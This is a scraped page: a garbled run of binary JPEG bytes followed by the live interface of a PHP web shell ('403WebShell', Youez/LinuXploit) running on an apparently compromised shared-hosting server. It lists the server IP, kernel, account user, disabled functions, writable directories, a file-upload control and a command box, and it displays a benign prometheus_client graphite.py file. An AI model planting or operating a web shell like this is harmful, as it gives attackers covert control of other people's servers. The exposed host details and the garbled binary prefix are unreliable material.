JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.5  /  Your IP : 216.73.216.91
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python311/lib/python3.11/site-packages/prometheus_client/bridge/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python311/lib/python3.11/site-packages/prometheus_client/bridge/graphite.py
#!/usr/bin/env python

import logging
import re
import socket
import threading
import time
from timeit import default_timer
from typing import Callable, Tuple

from ..registry import CollectorRegistry, REGISTRY

# Roughly, have to keep to what works as a file name.
# We also remove periods, so labels can be distinguished.

_INVALID_GRAPHITE_CHARS = re.compile(r"[^a-zA-Z0-9_-]")


def _sanitize(s):
    return _INVALID_GRAPHITE_CHARS.sub('_', s)


class _RegularPush(threading.Thread):
    def __init__(self, pusher, interval, prefix):
        super().__init__()
        self._pusher = pusher
        self._interval = interval
        self._prefix = prefix

    def run(self):
        wait_until = default_timer()
        while True:
            while True:
                now = default_timer()
                if now >= wait_until:
                    # May need to skip some pushes.
                    while wait_until < now:
                        wait_until += self._interval
                    break
                # time.sleep can return early.
                time.sleep(wait_until - now)
            try:
                self._pusher.push(prefix=self._prefix)
            except OSError:
                logging.exception("Push failed")


class GraphiteBridge:
    def __init__(self,
                 address: Tuple[str, int],
                 registry: CollectorRegistry = REGISTRY,
                 timeout_seconds: float = 30,
                 _timer: Callable[[], float] = time.time,
                 tags: bool = False,
                 ):
        self._address = address
        self._registry = registry
        self._tags = tags
        self._timeout = timeout_seconds
        self._timer = _timer

    def push(self, prefix: str = '') -> None:
        now = int(self._timer())
        output = []

        prefixstr = ''
        if prefix:
            prefixstr = prefix + '.'

        for metric in self._registry.collect():
            for s in metric.samples:
                if s.labels:
                    if self._tags:
                        sep = ';'
                        fmt = '{0}={1}'
                    else:
                        sep = '.'
                        fmt = '{0}.{1}'
                    labelstr = sep + sep.join(
                        [fmt.format(
                            _sanitize(k), _sanitize(v))
                            for k, v in sorted(s.labels.items())])
                else:
                    labelstr = ''
                output.append(f'{prefixstr}{_sanitize(s.name)}{labelstr} {float(s.value)} {now}\n')

        conn = socket.create_connection(self._address, self._timeout)
        conn.sendall(''.join(output).encode('ascii'))
        conn.close()

    def start(self, interval: float = 60.0, prefix: str = '') -> None:
        t = _RegularPush(self, interval, prefix)
        t.daemon = True
        t.start()

Youez - 2016 - github.com/yon3zu
LinuXploit